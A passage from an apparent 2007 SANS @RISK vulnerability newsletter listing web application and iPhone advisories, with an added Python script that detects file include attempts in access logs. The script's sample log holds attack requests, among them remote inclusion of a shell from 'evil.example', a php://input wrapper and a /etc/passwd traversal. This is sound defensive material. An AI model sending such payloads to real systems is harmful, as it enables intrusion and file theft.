  • Description: MX Glance is a module for the mxBB bulletin board. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "phpbb_root_path" parameter of the "contrib/mx_glance_sdesc.php" script. MX Glance version 2.3.3 is affected.
  • Ref: http://www.securityfocus.com/bid/25866

  • 07.41.53 - CVE: Not Available
  • Platform: Web Application
  • Title: phpBB openID OPENID_ROOT_PATH Parameter Remote File Include
  • Description: phpBB is an open-source forum application implemented in PHP. phpBB-openID is a module that allows forum users to log in with their OpenID credentials; OpenID is a decentralized single sign-on system. The module is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "OPENID_ROOT_PATH" parameter of the "/includes/openid/Auth/OpenID/BBStore.php" script. phpBB openID version 0.2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25867

  • 07.41.54 - CVE: Not Available
  • Platform: Web Application
  • Title: actSite BASE.PHP BASECFG[BASEDIR] Parameter Remote File Include
  • Description: actSite is a content management system. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "BaseCfg[BaseDir]" parameter of the "lib/base.php" script. actSite version 1.99.1 Beta is affected.
  • Ref: http://www.securityfocus.com/bid/25868

  • 07.41.55 - CVE: Not Available
  • Platform: Web Application
  • Title: actSite NEWS.PHP Local File Include
  • Description: actSite is a content management system. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "do" parameter of the "/phpinc/news.php" script. actSite version 1.56 is affected.
  • Ref: http://www.securityfocus.com/bid/25869

  • 07.41.56 - CVE: Not Available
  • Platform: Web Application
  • Title: phpFreeLog log.php Local File Include
  • Description: phpFreeLog is a PHP-based server logging tool. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "var" parameter of the "log.php" script. phpFreeLog alpha version 0.2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25873

  • 07.41.57 - CVE: Not Available
  • Platform: Web Application
  • Title: Netkamp Emlak Scripti Multiple Input Validation Vulnerabilities
  • Description: Netkamp Emlak Scripti is a web-based application implemented in ASP. The application is exposed to multiple input validation issues because it fails to sufficiently sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/bid/25875

  • 07.41.58 - CVE: Not Available
  • Platform: Web Application
  • Title: phpwcms-xt HTML_MENU_DirPath Multiple Remote File Include Vulnerabilities
  • Description: phpwcms-xt is a web-based content management system based on phpwcms. The application is exposed to multiple remote file include issues because it fails to properly sanitize user-supplied input before using it in a PHP "require_once()" function call. phpwcms-xt version 0.0.7-beta is affected.
  • Ref: http://www.securityfocus.com/bid/25879

  • 07.41.59 - CVE: Not Available
  • Platform: Web Application
  • Title: Y&K Iletisim Formu Multiple HTML Injection Vulnerabilities
  • Description: Iletisim Formu is an ASP-based form for posting messages. The application is exposed to multiple HTML injection issues because it fails to properly sanitize user-supplied input to the "Login.asp" and "iletisim.asp" scripts. Iletisim Formu version 1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25874

  • 07.41.60 - CVE: Not Available
  • Platform: Web Application
  • Title: AlstraSoft Affiliate Network Pro Multiple Access Validation Vulnerabilities
  • Description: AlstraSoft Affiliate Network Pro is exposed to multiple access validation issues. The application fails to restrict access to the following administrative scripts: "/admin/backupstart.php" and "/admin/downloadbackup.php". Affiliate Network Pro version 8.0 is affected.
  • Ref: http://www.securityfocus.com/bid/25882

  • 07.41.61 - CVE: Not Available
  • Platform: Web Application
  • Title: XOOPS Uploader Class Arbitrary File Upload
  • Description: XOOPS is a PHP-based content manager. The application is exposed to an arbitrary file upload issue because it fails to sufficiently sanitize user-supplied input. The issue is due to an unspecified error in the XOOPS uploader class.
  • Ref: http://www.xoops.org/modules/news/article.php?storyid=3963

  • 07.41.62 - CVE: Not Available
  • Platform: Web Application
  • Title: Ilient SysAid Cross-Site Request Forgery
  • Description: SysAid is a web-based helpdesk application implemented in JSP for Tomcat. The application is exposed to a cross-site request forgery issue. Exploiting this issue may allow a remote attacker to use a victim's currently active session to perform actions within the application. SysAid versions 4.5.03 and 4.5.04 are affected.
  • Ref: http://www.securityfocus.com/bid/25885

  • 07.41.63 - CVE: Not Available
  • Platform: Web Application
  • Title: Quicksilver Forums Information Disclosure Vulnerability and PM Deletion
  • Description: Quicksilver Forums is a web-based forum application. The application is exposed to multiple remote issues: an information disclosure issue in the error reporting library, and an issue that permits an attacker to delete other users' private messages (PMs). Quicksilver Forums versions prior to 1.4.1 are affected.
  • Ref: http://www.securityfocus.com/bid/25887

  • 07.41.64 - CVE: Not Available
  • Platform: Web Application
  • Title: Segue CMS themesdir Parameter Remote File Include
  • Description: Segue CMS is a web-based content management system. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input before using it in a PHP "include()" function call. Specifically, input to the "themesdir" parameter of "index.php" isn't properly sanitized. Segue CMS version 1.8.4 is affected.
  • Ref: http://www.securityfocus.com/bid/25889

  • 07.41.65 - CVE: Not Available
  • Platform: Web Application
  • Title: Poppawid ChildWindow.Inc.PHP Remote File Include
  • Description: Poppawid is a PHP-based webmail client. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "form" parameter of the "/mail/childwindow.inc.php" script. Poppawid version 2.7 is affected.
  • Ref: http://www.securityfocus.com/bid/25897

  • 07.41.66 - CVE: Not Available
  • Platform: Web Application
  • Title: Content Builder postComment.php Remote File Include
  • Description: Content Builder is a PHP-based news and article management application. The application is exposed to a remote file include issue because it fails to sufficiently sanitize user-supplied input to the "path[cb]" parameter of the "postComment.php" script. Content Builder version 0.7.5 is affected.
  • Ref: http://www.securityfocus.com/archive/1/481435

  • 07.41.67 - CVE: Not Available
  • Platform: Web Application
  • Title: Ossigeno CMS Footer.PHP Remote File Include
  • Description: Ossigeno CMS is a web-based content manager. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input before using it in a PHP "include()" function call. Specifically, input to the "level" parameter of "upload/common/footer.php" isn't properly sanitized. Ossigeno CMS version 2.2_alpha3 is affected.
  • Ref: http://www.securityfocus.com/bid/25924

  • 07.41.68 - CVE: Not Available
  • Platform: Web Application
  • Title: Cart32 GetImage Arbitrary File Download
  • Description: Cart32 is a web-based shopping cart application. The application is exposed to an arbitrary file download issue because it fails to sufficiently sanitize user-supplied input to the "ImageName" parameter of the "GetImage" script. Cart32 version 6.3 is affected.
  • Ref: http://www.securityfocus.com/bid/25928

  • 07.41.69 - CVE: Not Available
  • Platform: Web Application
  • Title: Blackboard Learning System ComposeMessage.JSP Multiple HTML Injection Vulnerabilities
  • Description: Blackboard Learning System is software for online teaching. The application is exposed to multiple HTML injection issues because the software fails to properly sanitize user-supplied input before using it in dynamically generated content. Specifically, it fails to properly sanitize user-supplied input to the "subject_t" and "body_text" parameters of the "messaging/course/composeMessage.jsp" script. Blackboard Learning System version 6.3.1.593 and Blackboard Learning and Community Portal System version 6.3.1.593 are affected.
  • Ref: http://trew.icenetx.net/toolz/advisory-blackboard-messages-en.txt

  • 07.41.70 - CVE: Not Available
  • Platform: Web Application
  • Title: Trionic Cite CMS BFIELD[BF_DATA] Parameter Multiple Remote File Include Vulnerabilities
  • Description: Trionic Cite CMS is a web-based content manager. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "bField[bf_data]" parameter of the following scripts: "/interface/editors/custom.php" and "/interface/editors/-custom.php". Trionic Cite CMS version 1.2 rev9 is affected.
  • Ref: http://www.securityfocus.com/bid/25933
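
The remote and local file include entries in this section (07.41.50 through 07.41.70) all hinge on a parameter whose value ends up in a PHP "include()" or "require_once()" call. For a defender, the practical question is whether anyone is already probing for them, and the tell is simple: a URL scheme or PHP stream wrapper in such a parameter means a remote include attempt, while directory traversal or a "%00" null byte (which truncated an appended ".php" suffix in PHP releases before 5.3.4) means a local one. The following is an added detection example, not code from the newsletter or from any listed project. The watched parameter names are taken from the entries above; the access log lines, IP addresses, hosts and script paths are constructed for the demo, and the check generalizes to any other include-style parameter you add to the set.

```python
"""Added example: hunting for file include attempts in web server access logs.

The log lines below are constructed for the demo; only the parameter names are
taken from the advisories in this section.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names the entries above report as reaching include()/require().
# Compared case-insensitively; array-style names (path[cb]) match as written.
INCLUDE_PARAMS = {
    "phpbb_root_path", "openid_root_path", "basecfg[basedir]", "do", "var",
    "themesdir", "form", "path[cb]", "level", "bfield[bf_data]",
    "html_menu_dirpath",
}

# Remote include: a URL scheme or a PHP stream wrapper at the start of the value.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?|php|data|expect|phar)://", re.I)
# Local include: a ".." path component, or a null byte cutting off a suffix.
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")
NULL_BYTE = "\x00"

# Common Log Format: host ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log (hosts, addresses and paths are invented).
SAMPLE_LOG = [
    # Benign: no watched parameter present.
    '203.0.113.7 - - [08/Oct/2007:10:01:02 +0000] "GET /forum/index.php?sid=abc HTTP/1.1" 200 5120',
    # RFI against an MX Glance-style phpbb_root_path (07.41.52): attacker-hosted script.
    '198.51.100.23 - - [08/Oct/2007:10:01:09 +0000] "GET /forum/modules/mx_glance/contrib/mx_glance_sdesc.php?phpbb_root_path=http://evil.example/shell.txt? HTTP/1.1" 200 231',
    # RFI through the php:// wrapper, double URL-encoded to dodge naive filters.
    '198.51.100.23 - - [08/Oct/2007:10:01:15 +0000] "GET /cms/index.php?themesdir=php%253A%252F%252Finput HTTP/1.1" 200 88',
    # LFI against a phpFreeLog-style "var" (07.41.56): traversal plus null byte.
    '192.0.2.77 - - [08/Oct/2007:10:02:30 +0000] "GET /log.php?var=../../../../etc/passwd%00 HTTP/1.1" 200 1403',
    # Watched parameter with an ordinary value: must not be flagged.
    '203.0.113.7 - - [08/Oct/2007:10:03:00 +0000] "GET /phpinc/news.php?do=show HTTP/1.1" 200 2048',
    # Array-style name, as in Content Builder's path[cb] (07.41.66).
    '198.51.100.23 - - [08/Oct/2007:10:04:12 +0000] "GET /postComment.php?path%5Bcb%5D=https://evil.example/x.txt%3F HTTP/1.1" 200 411',
]


def decode(value: str) -> str:
    """URL-decode twice: double encoding is a common evasion, and unquote is
    idempotent on already-decoded text."""
    return unquote(unquote(value))


def classify_value(value: str):
    """Return 'rfi', 'lfi' or None for one parameter value."""
    v = decode(value)
    if REMOTE_SCHEME.search(v):
        return "rfi"
    if NULL_BYTE in v or TRAVERSAL.search(v):
        return "lfi"
    return None


def scan_line(line: str):
    """Return (ip, script, parameter, kind) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    # parse_qsl already URL-decodes once; keep_blank_values so "var=" still shows up.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name.lower() not in INCLUDE_PARAMS:
            continue
        kind = classify_value(value)
        if kind:
            return (m.group("ip"), target.path, name, kind)
    return None


def scan_log(lines):
    """Run scan_line over every record and keep the hits, in log order."""
    return [hit for hit in (scan_line(line) for line in lines) if hit]


if __name__ == "__main__":
    for ip, script, param, kind in scan_log(SAMPLE_LOG):
        print(f"{kind.upper():3s} {ip:15s} {script} ({param})")
```

Against the sample log the scan reports three remote include attempts and one local one and stays quiet on the two benign requests. In production you would feed it the real access log and extend INCLUDE_PARAMS from your own inventory; a hit on a 200 status (rather than a 404 or 500) is the record to escalate, because it means the vulnerable script exists and answered.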

  • 07.41.71 - CVE: CVE-2007-4671
  • Platform: Network Device
  • Title: Apple iPhone Safari Browser Same Domain Content Manipulation
  • Description: The Apple iPhone Safari browser is exposed to an issue in how it isolates HTTP and HTTPS content served from the same domain. The issue allows JavaScript served over HTTP to access content from the same domain that is served over HTTPS, so an attacker who can inject or serve script over HTTP can execute arbitrary script code in the context of the domain's HTTPS pages. Apple iPhone Safari browser versions prior to iPhone 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.72 - CVE: CVE-2007-3760
  • Platform: Network Device
  • Title: Apple iPhone 1.1.1 Mobile Safari Browser Same Origin Policy Bypass
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The application is exposed to an issue that lets attackers bypass the same-origin policy. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.73 - CVE: CVE-2007-3759
  • Platform: Network Device
  • Title: Apple iPhone Mobile Safari Browser JavaScript Execution Weakness
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The Mobile Safari browser is exposed to a weakness in how it disables JavaScript: script may continue to run after the user turns the setting off. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.74 - CVE: CVE-2007-3753
  • Platform: Network Device
  • Title: Apple iPhone Bluetooth Arbitrary Code Execution
  • Description: Apple iPhone is a mobile phone. A remote code execution issue affects the iPhone Bluetooth server because it fails to adequately sanitize user-supplied data in specially crafted Service Discovery Protocol (SDP) packets. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.75 - CVE: CVE-2007-3758
  • Platform: Network Device
  • Title: Apple iPhone Mobile Safari Browser Window Properties Same Origin Policy Bypass
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The application is exposed to an issue that allows attackers to bypass the same-origin policy. iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.76 - CVE: CVE-2007-3761
  • Platform: Network Device
  • Title: Apple iPhone Safari Browser Frame Events Same-Origin Policy Bypass
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The application is exposed to an issue that lets attackers bypass the same-origin policy. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.77 - CVE: CVE-2007-3757
  • Platform: Network Device
  • Title: Apple iPhone Unauthorized tel: Initiation
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The Mobile Safari browser is exposed to an issue that can result in the unintentional dialing of a telephone number, because the browser allows calls to be placed via "tel:" URIs. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.78 - CVE: CVE-2007-3754
  • Platform: Network Device
  • Title: Apple iPhone 1.1.1 Mail Information Disclosure
  • Description: Apple iPhone Mail is exposed to an information disclosure issue that occurs when the application is configured to use SSL for incoming and outgoing connections. The application fails to notify the user when the connected mail server changes or can no longer be trusted. This occurs because the application fails to check if the X.509 certificate has changed or has become invalid. Apple iPhone Mail versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.79 - CVE: CVE-2007-3756
  • Platform: Network Device
  • Title: Apple iPhone Mobile Safari Cross-Domain URI Disclosure
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of the Apple Safari Browser called Mobile Safari. iPhone runs on the ARM architecture. The Mobile Safari browser is exposed to an issue that allows an attacker to obtain the contents of an unrelated URI from a different domain. iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.80 - CVE: CVE-2007-3755
  • Platform: Network Device
  • Title: Apple iPhone Mail Unauthorized tel: Initiation
  • Description: Apple iPhone is a mobile phone. It contains a stripped-down version of Apple Mail. iPhone runs on the ARM architecture. The Mail application is exposed to an issue that can result in the unintentional dialing of a telephone number, or the dialing of a number other than the one displayed, because it allows calls to be placed via "tel:" URIs. Apple iPhone versions prior to 1.1.1 are affected.
  • Ref: http://docs.info.apple.com/article.html?artnum=306586

  • 07.41.81 - CVE: Not Available
  • Platform: Network Device
  • Title: Arbor Networks Peakflow SP Unspecified Access Control Bypass
  • Description: Peakflow SP is a network management appliance targeted at network service providers. The application is exposed to an access control bypass issue due to an unspecified error. Peakflow SP versions 3.5.1 and 3.6.1 are affected.
  • Ref: http://www.securityfocus.com/bid/25907

(c) 2007. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.